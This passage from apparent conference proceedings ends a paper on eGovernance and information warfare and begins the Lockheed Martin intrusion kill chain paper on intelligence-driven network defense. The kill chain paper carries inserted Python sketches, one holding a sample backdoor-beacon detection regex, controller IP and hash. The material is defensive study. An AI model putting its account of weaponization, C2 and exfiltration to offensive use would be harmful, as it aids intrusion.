“the use of ICT (Information and communication technologies) by different actors of the society, with<br />
the aim to improve their access to information and to build their capacities” (UNESCO, 2009). In much<br />
more detail, according to UNESCO, Governance refers to the exercise of political, economic and<br />
administrative authority in the management of a country’s affairs, including citizens’ articulation of their<br />
interests and exercise of their legal rights and obligations. eGovernance may be understood as the<br />
performance of this governance via the electronic medium in order to facilitate an efficient, speedy<br />
and transparent process of disseminating information to the public, and other agencies, and for<br />
performing government administration activities. eGovernance is generally considered as a wider<br />
concept than eGovernment, since it can bring about a change in the way how citizens relate to<br />
governments and to each other. eGovernance can bring forth new concepts of citizenship, both in<br />
terms of citizen needs and responsibilities. Its objective is to engage, enable and empower the citizen<br />
(different stakeholders). The use of information technology can increase the broad involvement of<br />
citizens in the process of governance at all levels by providing the possibility of on-line discussion<br />
groups and by enhancing the rapid development and effectiveness of pressure groups.<br />
Advantages for the government include the ability to provide a better<br />
service in terms of time, making governance more efficient and more effective. In addition,<br />
transaction costs can be lowered and government services become more accessible.<br />
This leads to the eGovernance Framework, which organizes the eGovernance activity and focuses on:<br />
1. Establishing governance, monitoring and control;<br />
2. Developing and responding to strategic direction for the different stakeholders;<br />
3. Defining a roles and responsibility matrix; and<br />
4. Adapting to new changes in strategies.<br />
Since eGovernance will hold most of the government, economy and community<br />
information, and will engage different stakeholders internal and external to the country, security<br />
and protection become the biggest concern. Mechling (2000) mentioned that one<br />
of the most common issues in governance is protecting privacy and security, a<br />
major concern that can be considered an obstacle for such systems. Substantially, the defence and<br />
security of this framework will be critical to its success; the political risks of security breaches in this<br />
framework are perceived to be far more serious than other risks, since a breach can impact the government’s<br />
political position, the economy and citizens.<br />
3. Strategic information warfare<br />
The concept of Information Warfare has been well documented (for example, Schwartau, 1996;<br />
Dearth and Williamson, 1996; Knecht, 1996; Waltz, 1998; Denning, 1999). By definition, the<br />
fundamental weapon and target in information warfare is 'information'. It is the product that has<br />
to be manipulated to the advantage of those trying to influence events. The means of achieving this<br />
are manifold. Protagonists can attempt to alter data directly or to deprive competitors of access to<br />
it. The technology of information collection, storage, and dissemination can be compromised. Using<br />
other, more subtle techniques, the way the data is interpreted can be changed by altering the context<br />
in which it is viewed. Thus, the range of activities in the brief of information warfare is manifest<br />
(Hutchinson and Warren, 2001).<br />
Figure 1: The relationships between data, context, knowledge, information; and the methods by<br />
which each element can be attacked, (Hutchinson, Warren, 2001)<br />
From a military point of view, an enemy is defined and specific actions and procedures are<br />
prepared for defense or attack; with eGovernance, however, not all enemies are defined or detected,<br />
which calls for a concept to detect such enemies or threats.<br />
Different definitions and concepts related to information warfare have been proposed (Libicki, 1995):<br />
Command-and-Control Warfare [C2W];<br />
Intelligence-based Warfare [IBW];<br />
Electronic Warfare [EW];<br />
Psychological Operations [PSYOPS];<br />
Hacker Warfare [software-based attacks on information systems];<br />
Information Economic Warfare [IEW; war via the control of information trade];<br />
Cyberwar [combat in the virtual realm].<br />
As an example; The United States has substantial information-based resources, including complex<br />
management systems and infrastructures involving the control of electric power, money flow, air<br />
traffic, oil and gas, and other information-dependent items. U.S. allies and potential coalition partners<br />
are similarly increasingly dependent on various information infrastructures. Conceptually, if and when<br />
potential adversaries attempt to damage these systems using IW techniques, information warfare<br />
inevitably takes on a strategic aspect (Molander, Riddile and Wilson, 1996).<br />
The Basic Features of Strategic Information Warfare:<br />
Low entry cost: Unlike traditional weapon technologies, development of information- based<br />
techniques does not require sizable financial resources or state sponsorship. Information systems<br />
expertise and access to important networks may be the only prerequisites.<br />
Blurred traditional boundaries: Traditional distinctions (public versus private interests, warlike<br />
versus criminal behavior, and geographic boundaries such as those historically defined between<br />
nations) are complicated by the growing interaction within the information<br />
infrastructure.<br />
4. Types of information warfare: Cyber war / cyber crime / espionage<br />
The Department of Defense (DoD) defines cyberspace as follows: A global domain within the<br />
information environment consisting of the interdependent network of information technology<br />
infrastructures, including the Internet, telecommunications networks, computer systems, and<br />
embedded processors and controllers. (DoD Dictionary of Military, 2008)<br />
Recently, cyberspace, which is becoming the main field of information warfare, has started to develop as a<br />
military domain, joining the historic domains of land, sea, air, and space. All this might lead to the belief<br />
that the historic constructs of war, such as force, offense, defense, and deterrence, can be applied to<br />
cyberspace with little modification. But cyberspace must be understood in its own terms, and the policy decisions<br />
being made for these and other new commands must reflect such understanding. Attempts to transfer<br />
policy constructs from other forms of warfare will not only fail but also hinder policy and<br />
planning (Libicki, 2009).<br />
The main targets of an information attack are the potential elements<br />
in an information system that are prone to attack and exploitation, which Denning (1999) outlines as:<br />
Data stores: for example, computer and human memories.<br />
Communication channels: for example, humans, and telecommunication systems.<br />
Sensors/input devices: for example, scanners, cameras, microphones, human senses.<br />
Output devices: for example, disk writers, printers, human processes.<br />
Manipulators of data: for example, microprocessors, humans, software.<br />
The most relevant forms of information warfare are the following:<br />
Strategic Cyber-War: A campaign of Cyber-Attacks launched by one entity against a state and<br />
its society, primarily but not exclusively for the purpose of affecting the target state’s behavior,<br />
would be strategic Cyber-War. The attacking entity can be a state or a non-state actor (Libicki, 2009)<br />
Cyber-War: actions by a nation-state to penetrate another nation's computers or networks for the<br />
purpose of causing damage or disruption (Clarke, 2010).<br />
Cyber Crime: any crime that involves a computer and a network, where the computer<br />
may or may not have played an instrumental part in the commission of the crime.<br />
Espionage or spying: obtaining information that is considered secret or<br />
confidential without the permission of the holder of this information.<br />
5. Types of threats internal / external and state / non state<br />
Critical to the success of any eGovernance framework, is its security. Since such governance<br />
frameworks somehow will be open to interactions with different “stakeholders”, who may, by making<br />
use of eGovernance frameworks, influence the decision making process in the government, create<br />
political pressure or even start a cyber-war.<br />
A. Internal Stakeholders [Domestic] (within the boundaries of the state), such as:<br />
Pressure groups,<br />
Political parties,<br />
Businesses,<br />
Citizens,<br />
Organized crime, etc.<br />
or<br />
B. External Stakeholders [Foreign] (outside the boundaries of the state), such as:<br />
Other states,<br />
Multinational businesses,<br />
Worldwide operating malicious organizations, etc.<br />
Given the wide array of possible opponents, weapons, and strategies, it becomes increasingly difficult<br />
to distinguish between foreign and domestic sources of IW threats and actions. You may not know<br />
who’s under attack by whom, or who’s in charge of the attack. This greatly complicates the traditional<br />
role distinction between domestic law enforcement, on the one hand, and national security and<br />
intelligence entities on the other. Another consequence of this blurring phenomenon is the<br />
disappearance of clear distinctions between different levels of anti-state activity, ranging from crime to<br />
warfare (Molander, Riddile and Wilson, 1996).<br />
6. Importance of eGovernance to national security and the need to cover it in<br />
information warfare strategies<br />
The presence of threats such as terrorists, competitors, state enemies and malicious organizations<br />
makes information warfare a pressing concern for governments and for the private sector attached to<br />
eGovernance frameworks. It demands serious attention to developing strategic information warfare<br />
capabilities that protect the military, physical, economic, political and social dimensions (Molander,<br />
Riddile and Wilson, 1996).<br />
7. Non military response: Policies, laws, diplomacies, awareness and media<br />
Governments have to develop military as well as non-military tools and mechanisms that can<br />
supplement dynamic eGovernance frameworks. The application domains encompass the political,<br />
legal and diplomatic fields. Interaction between agencies inside and outside the government, in<br />
addition to international affairs, will be needed to define international legal regulations and political<br />
channels to control relevant threats. In the end, it will certainly require a (re)definition of the distribution<br />
of responsibilities for international legal arrangements in case of legal disputes, such as those taking<br />
place in the United Nations or NATO.<br />
The appropriate role for the government in responding to the strategic information warfare threat<br />
impacting the eGovernance framework needs to be addressed; this role will be part leadership and part<br />
partnership with the domestic sector. In addition to performing certain basic functions, such<br />
as organizing, equipping, training, and sustaining military forces, the government may play a more<br />
productive and efficient role as facilitator and maintainer of some information systems and<br />
infrastructure, and through policy mechanisms such as tax breaks to encourage reducing vulnerability<br />
and improving recovery and reconstitution capability. An important factor is the traditional change in<br />
the government’s role as one moves from national defense through public safety toward things that<br />
represent the public good. Clearly, the government’s perceived role in this area will have to be<br />
balanced against public perceptions of the loss of civil liberties and the commercial sector’s concern<br />
about unwarranted limits on its practices and markets.<br />
When responding to information warfare, military strategy can thus no longer focus just on supporting<br />
operations. It must also examine the implications of information warfare for the state’s and its allies’<br />
strategic infrastructures (military, physical, economic, political, and social) that depend upon<br />
information systems and information support.<br />
Figure 2: Strategic information warfare impact (Molander, Riddile and Wilson, 1996)<br />
Governments can use and develop different tools and techniques to handle such situations:<br />
Research and Development: The government’s role in defending against such threats, apart from<br />
protecting its own systems, is indirect: Sponsor research, development, and standard creation in<br />
computer network defense. Maximize the incentives for private industry to keep its own house in<br />
order. Increase the resources devoted to cyber forensics, including the distribution of honeypots<br />
to trap rogue code for analysis. Encourage information-sharing among both private and public<br />
network operators. Invest in threat intelligence. Subsidize the education of computer security<br />
professionals. All are current agenda items. In a cyberwar, all would receive greater emphasis.<br />
(Libicki, 2009)<br />
Policy: defining policies that deal with different strategic information warfare threats and<br />
engage different international parties, and also working on what constitutes an act of war, which<br />
may be defined in one of three ways: universally, multilaterally, or unilaterally. A universal<br />
definition is one that every state accepts. The closest analog to “every state” is when the United<br />
Nations says that something is an act of war. The next-closest analog is if enough nations have<br />
signed a treaty that says as much. No such United Nations dictum exists, and no treaty says as<br />
much. One might argue that a cyber attack (which is an output of strategic information warfare) is<br />
like something else that is clearly an act of war, but unless there is a global consensus that such<br />
an analogy is valid, it cannot be defined as an act of war.<br />
Laws: develop clear laws to criminalize actions which threaten the eGovernance framework,<br />
especially internal threats.<br />
Diplomatic: develop networks of allies to discover joint threats that can impact each other’s<br />
governance, through intelligence and early detection.<br />
Awareness and media: create awareness among citizens working with the eGovernance<br />
framework on how to protect themselves, how to report violations, and how to recognize<br />
different types of threat and the legal consequences of violations.<br />
8. Conclusion<br />
It is becoming obvious that eGovernance will become the information backbone of any government,<br />
which creates a strong relation to strategic information warfare, since both are based on information<br />
and use technology. In addition, eGovernance will contain most of the government’s and community’s<br />
information and will become one of the main battlefields of the future. This requires a different kind of<br />
attention, since not all existing warfare techniques will be applicable to handling eGovernance threats;<br />
the response should include non-military approaches such as policy, diplomacy and laws.<br />
The main challenge for an eGovernance framework is adaptability. Continuous changes in<br />
government strategies and in the surrounding environment, plus continuous changes in technology<br />
and in threat parties, whether internal or external, will require continuous development to cope with<br />
such changes and with a complex decision-making structure. Moreover, some conditions of strategic<br />
information warfare have to be taken into account in the design process of eGovernance frameworks,<br />
such as: control of different stakeholders, monitoring and detection, continuous development, and the<br />
definition of different response approaches to deal with the rapidly changing environment and the<br />
changing enemy map.<br />
References<br />
Bhatnagar, Subash (2004) eGovernment: From Vision to Implementation, Sage Publications.<br />
Clarke, Richard A. (April 2010) Cyber War: The Next Threat to National Security and What to Do About It, Ecco.<br />
Dearth, Douglas H. (2001) “Implications and Challenges of Applied Information Operations”, Joint Military<br />
Intelligence Training Centre, Washington D.C., Journal of Information Warfare, Volume 1, Issue 1.<br />
Denning, D.E. (1999). Information Warfare and Security, Addison Wesley, Reading: Mass.<br />
DoD Dictionary of Military Terms (October 2008), Washington, D.C., Joint Doctrine Division, J-7.<br />
Drucker, Peter F. (August 24, 1998) “The Next Information Revolution”, Forbes ASAP.<br />
Hutchinson, W. and Warren, M. (2001) “Principles of Information Warfare”, Journal of Information Warfare 1, 1:<br />
1-6, ISSN 1445-3312 print / ISSN 1445-3347.<br />
Hutchinson, W.E. and Warren, M.J. (1999) Attacking the Attackers: Attitudes of Australian IT Managers to<br />
Retaliation against Hackers, ACIS (Australasian Conference on Information Systems) 99, December,<br />
Wellington, New Zealand.<br />
Libicki, Martin C. (2009) Cyberdeterrence and Cyberwar, RAND Corporation, Project Air Force.<br />
Libicki, Martin C. (May 1995) “What Is Information Warfare?”, Strategic<br />
Mechling, J. (2000), Eight Imperatives for Leaders in a Networked World, Massachusetts, The Harvard Policy<br />
Group<br />
Molander, Roger C., Riddile, Andrew S. and Wilson, Peter A. (1996) “Strategic Information Warfare: A New Face<br />
of War”, Office of the Secretary of Defense, National Defense Research Institute, RAND.<br />
Schwartau, W. (1996). Information Warfare – second edition. Thunder’s Mouth Press, New York.<br />
UNESCO(2009) http://portal.unesco.org/ci/en/ev.php-<br />
URL_ID=4404&URL_DO=DO_TOPIC&URL_SECTION=201.html (extracted 07.10.2010)<br />
Waltz, E. (1998) Information Warfare – Principles and Operations. Artech House, Norwood.<br />
World Bank, http://go.worldbank.org/M1JHE0Z280 (extracted on 02.10.2010)<br />
Intelligence-Driven Computer Network Defense Informed<br />
by Analysis of Adversary Campaigns and Intrusion Kill<br />
Chains<br />
Eric Hutchins, Michael Cloppert and Rohan Amin<br />
Lockheed Martin, USA<br />
eric.m.hutchins@lmco.com<br />
michael.j.cloppert@lmco.com<br />
rohan.m.amin@lmco.com<br />
Abstract: Conventional network defense tools such as intrusion detection systems and anti-virus focus on the<br />
vulnerability component of risk, and traditional incident response methodology presupposes a successful<br />
intrusion. An evolution in the goals and sophistication of computer network intrusions has rendered these<br />
approaches insufficient for certain actors. A new class of threats, appropriately dubbed the “Advanced Persistent<br />
Threat” (APT), represents well-resourced and trained adversaries that conduct multi-year intrusion campaigns<br />
targeting highly sensitive economic, proprietary, or national security information. These adversaries accomplish<br />
their goals using advanced tools and techniques designed to defeat most conventional computer network<br />
defense mechanisms. Network defense techniques which leverage knowledge about these adversaries can<br />
create an intelligence feedback loop, enabling defenders to establish a state of information superiority which<br />
decreases the adversary's likelihood of success with each subsequent intrusion attempt. Using a kill chain model<br />
to describe phases of intrusions, mapping adversary kill chain indicators to defender courses of action, identifying<br />
patterns that link individual intrusions into broader campaigns, and understanding the iterative nature of<br />
intelligence gathering form the basis of intelligence-driven computer network defense (CND). Institutionalization<br />
of this approach reduces the likelihood of adversary success, informs network defense investment and resource<br />
prioritization, and yields relevant metrics of performance and effectiveness. The evolution of advanced persistent<br />
threats necessitates an intelligence-based model because in this model the defenders mitigate not just<br />
vulnerability, but the threat component of risk, too.<br />
Keywords: incident response, intrusion detection, intelligence, threat, APT, computer network defense<br />
1. Introduction<br />
As long as global computer networks have existed, so have malicious users intent on exploiting<br />
vulnerabilities. Early evolutions of threats to computer networks involved self-propagating code.<br />
Advancements over time in anti-virus technology significantly reduced this automated risk. More<br />
recently, a new class of threats, intent on the compromise of data for economic or military<br />
advancement, emerged as the largest element of risk facing some industries. This class of threat has<br />
been given the moniker “Advanced Persistent Threat,” or APT. To date, most organizations have<br />
relied on the technologies and processes implemented to mitigate risks associated with automated<br />
viruses and worms, which do not sufficiently address focused, manually operated APT intrusions.<br />
Conventional incident response methods fail to mitigate the risk posed by APTs because they make<br />
two flawed assumptions: response should happen after the point of compromise, and the compromise<br />
was the result of a fixable flaw (Mitropoulos et al., 2006; National Institute of Standards and<br />
Technology, 2008).<br />
APTs have recently been observed and characterized by both industry and the U.S. government. In<br />
June and July 2005, the U.K. National Infrastructure Security Co-ordination Centre (UK-NISCC) and<br />
the U.S. Computer Emergency Response Team (US-CERT) issued technical alert bulletins describing<br />
targeted, socially-engineered emails dropping trojans to exfiltrate sensitive information. These<br />
intrusions occurred over a significant period of time, evaded conventional firewall and anti-virus<br />
capabilities, and enabled adversaries to harvest sensitive information (UK-NISCC, 2005; US-CERT,<br />
2005). Epstein and Elgin (2008) of Business Week described numerous intrusions into NASA and<br />
other government networks where APT actors were undetected and successful in removing sensitive<br />
high-performance rocket design information. In February 2010, iSec Partners noted that current<br />
approaches such as anti-virus and patching are not sufficient, end users are directly targeted, and<br />
threat actors are after sensitive intellectual property (Stamos, 2010).<br />
Before the U.S. House Armed Services Committee Subcommittee on Terrorism, Unconventional<br />
Threats and Capabilities, James Andrew Lewis of the Center for Strategic and International Studies<br />
testified that intrusions occurred at various government agencies in 2007, including the Department of<br />
Eric Hutchins et al.<br />
Defense, State Department and Commerce Department, with the intention of information collection<br />
(Lewis, 2008). With specificity about the nature of computer network operations reportedly emanating<br />
from China, the 2008 and 2009 reports to Congress of the U.S.-China Economic and Security Review<br />
Commission summarized reporting of targeted intrusions against U.S. military, government and<br />
contractor systems. Again, adversaries were motivated by a desire to collect sensitive information<br />
(U.S.-China Economic and Security Review Commission, 2008, 2009). Finally, in a report prepared for<br />
the U.S.-China Economic and Security Review Commission, Krekel (2009) profiles an advanced<br />
intrusion in extensive detail, demonstrating the patient and calculated nature of the APT.<br />
Advances in infrastructure management tools have enabled best practices of enterprise-wide patching<br />
and hardening, reducing the most easily accessible vulnerabilities in networked services. Yet APT<br />
actors continually demonstrate the capability to compromise systems by using advanced tools,<br />
customized malware, and “zero-day” exploits that anti-virus and patching cannot detect or mitigate.<br />
Responses to APT intrusions require an evolution in analysis, process, and technology; it is possible<br />
to anticipate and mitigate future intrusions based on knowledge of the threat. This paper describes an<br />
intelligence-driven, threat-focused approach to study intrusions from the adversaries’ perspective.<br />
Each discrete phase of the intrusion is mapped to courses of action for detection, mitigation and<br />
response. The phrase “kill chain” describes the structure of the intrusion, and the corresponding<br />
model guides analysis to inform actionable security intelligence. Through this model, defenders can<br />
develop resilient mitigations against intruders and intelligently prioritize investments in new technology<br />
or processes. Kill chain analysis illustrates that the adversary must progress successfully through<br />
each stage of the chain before it can achieve its desired objective; just one mitigation disrupts the<br />
chain and the adversary. Through intelligence-driven response, the defender can achieve an<br />
advantage over even APT-caliber aggressors.<br />
This paper is organized as follows: section two documents related work on phase based<br />
models of defense and countermeasure strategy. Section three introduces an intelligence-driven<br />
computer network defense model (CND) that incorporates threat-specific intrusion analysis and<br />
defensive mitigations. Section four presents an application of this new model to a real case study, and<br />
section five summarizes the paper and presents some thoughts on future study.<br />
2. Related work<br />
While the modeling of APTs and corresponding response using kill chains is unique, other phase<br />
based models of defensive and countermeasure strategies exist.<br />
A United States Department of Defense Joint Staff publication describes a kill chain with stages find,<br />
fix, track, target, engage, and assess (U.S. Department of Defense, 2007). The United States Air<br />
Force (USAF) has used this framework to identify gaps in Intelligence, Surveillance and<br />
Reconnaissance (ISR) capability and to prioritize the development of needed systems (Tirpak, 2000).<br />
Threat chains have also been used to model Improvised Explosive Device (IED) attacks (National<br />
Research Council, 2007). The IED delivery chain models everything from adversary funding to attack<br />
execution. Coordinated intelligence and defensive efforts focused on each stage of the IED threat<br />
chain as the ideal way to counter these attacks. This approach also provides a model for identification<br />
of basic research needs by mapping existing capability to the chain. Phase based models have also<br />
been used for antiterrorism planning. The United States Army describes the terrorist operational<br />
planning cycle as a seven step process that serves as a baseline to assess the intent and capability<br />
of terrorist organizations (United States Army Training and Doctrine Command, 2007). Hayes (2008)<br />
applies this model to the antiterrorism planning process for military installations and identifies<br />
principles to help commanders determine the best ways to protect themselves.<br />
Outside of military context, phase based models have also been used in the information security field.<br />
Sakuraba et al. (2008) describe the Attack-Based Sequential Analysis of Countermeasures (ABSAC)<br />
framework that aligns types of countermeasures along the time phase of an attack. The ABSAC<br />
approach includes more reactive post-compromise countermeasures than early detection capability to<br />
uncover persistent adversary campaigns. In an application of phase based models to insider threats,<br />
Duran et al. (2009) describe a tiered detection and countermeasure strategy based on the progress of<br />
malicious insiders. Willison and Siponen (2009) also address insider threat by adapting a phase<br />
based model called Situational Crime Prevention (SCP). SCP models crime from the offender’s<br />
perspective and then maps controls to various phases of the crime. Finally, the security company<br />
Mandiant proposes an “exploitation life cycle”. The Mandiant model, however, does not map courses<br />
of defensive action and is based on post-compromise actions (Mandiant, 2010). Moving detections<br />
and mitigations to earlier phases of the intrusion kill chain is essential for CND against APT actors.<br />
3. Intelligence-driven computer network defense<br />
Intelligence-driven computer network defense is a risk management strategy that addresses the<br />
threat component of risk, incorporating analysis of adversaries, their capabilities, objectives, doctrine<br />
and limitations. This is necessarily a continuous process, leveraging indicators to discover new<br />
activity with yet more indicators to leverage. It requires a new understanding of the intrusions<br />
themselves, not as singular events, but rather as phased progressions. This paper presents a new<br />
intrusion kill chain model to analyze intrusions and drive defensive courses of action.<br />
The effect of intelligence-driven CND is a more resilient security posture. APT actors, by their nature,<br />
attempt intrusion after intrusion, adjusting their operations based on the success or failure of each<br />
attempt. In a kill chain model, just one mitigation breaks the chain and thwarts the adversary,<br />
therefore any repetition by the adversary is a liability that defenders must recognize and leverage. If<br />
defenders implement countermeasures faster than adversaries evolve, it raises the costs an<br />
adversary must expend to achieve their objectives. This model shows, contrary to conventional<br />
wisdom, such aggressors have no inherent advantage over defenders.<br />
3.1 Indicators and the indicator life cycle<br />
The fundamental element of intelligence in this model is the indicator. For the purposes of this paper,<br />
an indicator is any piece of information that objectively describes an intrusion. Indicators can be<br />
subdivided into three types:<br />
Atomic – Atomic indicators are those which cannot be broken down into smaller parts and retain<br />
their meaning in the context of an intrusion. Typical examples here are IP addresses, email<br />
addresses, and vulnerability identifiers.<br />
Computed – Computed indicators are those which are derived from data involved in an incident.<br />
Common computed indicators include hash values and regular expressions.<br />
Behavioral – Behavioral indicators are collections of computed and atomic indicators, often<br />
subject to qualification by quantity and possibly combinatorial logic. An example would be a<br />
statement such as “the intruder initially used a backdoor which generated network traffic<br />
matching [regular expression] at the rate of [some frequency] to [some IP address], and then<br />
replaced it with one matching the MD5 hash [value] once access was established.”<br />
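The three indicator types can be modeled as simple data structures. The sketch below is illustrative only: the class names, fields, and sample values are our assumptions, not definitions from the paper.<br />

```python
from dataclasses import dataclass, field

@dataclass(frozen=True)
class AtomicIndicator:
    """Indivisible observable, e.g. an IP address, email address, or CVE id."""
    kind: str
    value: str

@dataclass(frozen=True)
class ComputedIndicator:
    """Derived from incident data, e.g. a file hash or regular expression."""
    kind: str
    value: str

@dataclass
class BehavioralIndicator:
    """Collection of atomic/computed indicators qualified by combinatorial logic."""
    description: str
    parts: list = field(default_factory=list)

# Hypothetical example modeled on the backdoor statement in the text
beacon = BehavioralIndicator(
    description="backdoor beacons to controller, later replaced by second tool",
    parts=[
        ComputedIndicator("regex", r"GET /update\?id=\d+"),            # beacon traffic pattern
        AtomicIndicator("ip", "203.0.113.7"),                          # controller address
        ComputedIndicator("md5", "d41d8cd98f00b204e9800998ecf8427e"),  # replacement tool hash
    ],
)
```

A behavioral indicator thus remains actionable even when any single atomic part changes, which is what makes the matching logic worth recording alongside the parts.<br />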
Using the concepts in this paper, analysts will reveal indicators through analysis or collaboration,<br />
mature these indicators by leveraging them in their tools, and then utilize them when matching activity<br />
is discovered. This activity, when investigated, will often lead to additional indicators that will be<br />
subject to the same set of actions and states. This cycle of actions, and the corresponding indicator<br />
states, form the indicator life cycle illustrated in Figure 1.<br />
Figure 1: Indicator life cycle states and transitions<br />
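The cycle in Figure 1 can be sketched as a tiny state machine. The state and action names below are our own illustrative labels for the reveal/mature/utilize cycle described in the text, since the figure itself is not reproduced here.<br />

```python
# Illustrative indicator life cycle: an indicator is revealed by analysis,
# matured by deployment into defensive tools, and utilized when matching
# activity is discovered -- investigation of which reveals new indicators.
TRANSITIONS = {
    ("revealed", "deploy"): "mature",
    ("mature", "match"): "utilized",
    ("utilized", "investigate"): "revealed",
}

def step(state, action):
    """Advance an indicator through the life cycle; invalid moves raise."""
    if (state, action) not in TRANSITIONS:
        raise ValueError(f"cannot {action!r} from state {state!r}")
    return TRANSITIONS[(state, action)]

# One full cycle returns to the starting state, mirroring the feedback loop
state = "revealed"
for action in ("deploy", "match", "investigate"):
    state = step(state, action)
```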
This applies to all indicators indiscriminately, regardless of their accuracy or applicability. Tracking the<br />
derivation of a given indicator from its predecessors can be time-consuming and problematic if<br />
sufficient tracking isn’t in place, thus it is imperative that indicators subject to these processes are<br />
valid and applicable to the problem set in question. If attention is not paid to this point, analysts may<br />
find themselves applying these techniques to threat actors for which they were not designed, or to<br />
benign activity altogether.<br />
3.2 Intrusion kill chain<br />
A kill chain is a systematic process to target and engage an adversary to create desired effects. U.S.<br />
military targeting doctrine defines the steps of this process as find, fix, track, target, engage, assess<br />
(F2T2EA): find adversary targets suitable for engagement; fix their location; track and observe; target<br />
with suitable weapon or asset to create desired effects; engage adversary; assess effects (U.S.<br />
Department of Defense, 2007). This is an integrated, end-to-end process described as a “chain”<br />
because any one deficiency will interrupt the entire process.<br />
Expanding on this concept, this paper presents a new kill chain model, one specifically for intrusions.<br />
The essence of an intrusion is that the aggressor must develop a payload to breach a trusted<br />
boundary, establish a presence inside a trusted environment, and from that presence, take actions<br />
towards their objectives, be they moving laterally inside the environment or violating the<br />
confidentiality, integrity, or availability of a system in the environment. The intrusion kill chain is<br />
defined as reconnaissance, weaponization, delivery, exploitation, installation, command and control<br />
(C2), and actions on objectives.<br />
With respect to computer network attack (CNA) or computer network espionage (CNE), the definitions<br />
for these kill chain phases are as follows:<br />
Reconnaissance - Research, identification and selection of targets, often represented as crawling<br />
Internet websites such as conference proceedings and mailing lists for email addresses, social<br />
relationships, or information on specific technologies.<br />
Weaponization - Coupling a remote access trojan with an exploit into a deliverable payload,<br />
typically by means of an automated tool (weaponizer). Increasingly, client application data files<br />
such as Adobe Portable Document Format (PDF) or Microsoft Office documents serve as the<br />
weaponized deliverable.<br />
Delivery - Transmission of the weapon to the targeted environment. The three most prevalent<br />
delivery vectors for weaponized payloads by APT actors, as observed by the Lockheed Martin<br />
Computer Incident Response Team (LM-CIRT) for the years 2004-2010, are email attachments,<br />
websites, and USB removable media.<br />
Exploitation - After the weapon is delivered to victim host, exploitation triggers intruders’ code.<br />
Most often, exploitation targets an application or operating system vulnerability, but it could also<br />
more simply exploit the users themselves or leverage an operating system feature that autoexecutes<br />
code.<br />
Installation - Installation of a remote access trojan or backdoor on the victim system allows the<br />
adversary to maintain persistence inside the environment.<br />
Command and Control (C2) - Typically, compromised hosts must beacon outbound to an Internet<br />
controller server to establish a C2 channel. APT malware especially requires manual interaction<br />
rather than conducting activity automatically. Once the C2 channel is established, intruders have<br />
“hands on the keyboard” access inside the target environment.<br />
Actions on Objectives - Only now, after progressing through the first six phases, can intruders<br />
take actions to achieve their original objectives. Typically, this objective is data exfiltration which<br />
involves collecting, encrypting and extracting information from the victim environment; violations<br />
of data integrity or availability are potential objectives as well. Alternatively, the intruders may only<br />
desire access to the initial victim box for use as a hop point to compromise additional systems<br />
and move laterally inside the network.<br />
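The seven phases above form an ordered chain, and a single mitigation at any phase breaks it. A minimal sketch of that property (the function names are ours, not the paper's):<br />

```python
KILL_CHAIN = [
    "reconnaissance", "weaponization", "delivery", "exploitation",
    "installation", "command_and_control", "actions_on_objectives",
]

def chain_breaks_at(mitigated_phases):
    """Return the earliest mitigated phase, or None if the intrusion
    progresses through all seven phases unimpeded."""
    for phase in KILL_CHAIN:
        if phase in mitigated_phases:
            return phase
    return None

def intrusion_succeeds(mitigated_phases):
    """The adversary reaches actions on objectives only if no phase breaks."""
    return chain_breaks_at(mitigated_phases) is None
```

For example, mitigating delivery alone stops an intrusion even when the exploit itself is unknown, since the chain never reaches the exploitation phase.<br />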
3.3 Courses of action<br />
The intrusion kill chain becomes a model for actionable intelligence when defenders align enterprise<br />
defensive capabilities to the specific processes an adversary undertakes to target that enterprise.<br />
Defenders can measure the performance as well as the effectiveness of these actions, and plan<br />
investment roadmaps to rectify any capability gaps. Fundamentally, this approach is the essence of<br />
intelligence-driven CND: basing security decisions and measurements on a keen understanding of the<br />
adversary.<br />
Table 1 depicts a course of action matrix using the actions of detect, deny, disrupt, degrade, deceive,<br />
and destroy from DoD information operations (IO) doctrine (U.S. Department of Defense, 2006). This<br />
matrix depicts in the exploitation phase, for example, that host intrusion detection systems (HIDS) can<br />
passively detect exploits, patching denies exploitation altogether, and data execution prevention<br />
(DEP) can disrupt the exploit once it initiates. Illustrating the spectrum of capabilities defenders can<br />
employ, the matrix includes traditional systems like network intrusion detection systems (NIDS) and<br />
firewall access control lists (ACL), system hardening best practices like audit logging, but also vigilant<br />
users themselves who can detect suspicious activity.<br />
Table 1: Courses of action matrix<br />
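Since Table 1 itself is not reproduced in this extraction, the matrix can be sketched as a sparse mapping from (phase, action) to capability. Only the exploitation-phase entries below come from the text; the rest of the matrix would be filled in from one's own environment.<br />

```python
ACTIONS = ["detect", "deny", "disrupt", "degrade", "deceive", "destroy"]

# Sparse course-of-action matrix; these entries are the example given in
# the text (HIDS detects, patching denies, DEP disrupts exploitation).
COA = {
    ("exploitation", "detect"): "HIDS",
    ("exploitation", "deny"): "patch",
    ("exploitation", "disrupt"): "DEP",
}

def capability_gaps(phase):
    """Actions for which no defensive capability is recorded for a phase;
    gaps are what inform investment roadmaps."""
    return [a for a in ACTIONS if (phase, a) not in COA]
```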
Here, completeness equates to resiliency, which is the defender’s primary goal when faced with<br />
persistent adversaries that continually adapt their operations over time. The most notable adaptations<br />
are exploits, particularly previously undisclosed “zero-day” exploits. Security vendors call these “zero-day<br />
attacks,” and tout “zero-day protection”. This myopic focus fails to appreciate that the exploit is<br />
but one change in a broader process. If intruders deploy a zero-day exploit but reuse observable tools<br />
or infrastructure in other phases, that major improvement is fruitless if the defenders have mitigations<br />
for the repeated indicators. This repetition demonstrates that a defensive strategy of complete indicator<br />
utilization achieves resiliency and forces the adversary to make more difficult and comprehensive<br />
adjustments to achieve their objectives. In this way, the defender increases the adversary’s cost of<br />
executing successful intrusions.<br />
Defenders can generate metrics of this resiliency by measuring the performance and effectiveness of<br />
defensive actions against the intruders. Consider an example series of intrusion attempts from a<br />
single APT campaign that occur over a seven month timeframe, shown in Figure 2. For each phase of<br />
the kill chain, a white diamond indicates relevant, but passive, detections were in place at the time of<br />
that month’s intrusion attempt, a black diamond indicates relevant mitigations were in place, and an<br />
empty cell indicates no relevant capabilities were available. After each intrusion, analysts leverage<br />
newly revealed indicators to update their defenses, as shown by the gray arrows. The illustration<br />
shows, foremost, that at least one mitigation was in place for all three intrusion attempts, thus<br />
mitigations were successful. However, it also clearly shows significant differences in each month. In<br />
December, defenders detect the weaponization and block the delivery but uncover a brand new,<br />
unmitigated, zero-day exploit in the process. In March, the adversary re-uses the same exploit, but<br />
evolves the weaponization technique and delivery infrastructure, circumventing detection and<br />
rendering those defensive systems ineffective. By June, the defenders had updated their capabilities<br />
sufficiently to have detections and mitigations layered from weaponization to C2. By framing metrics<br />
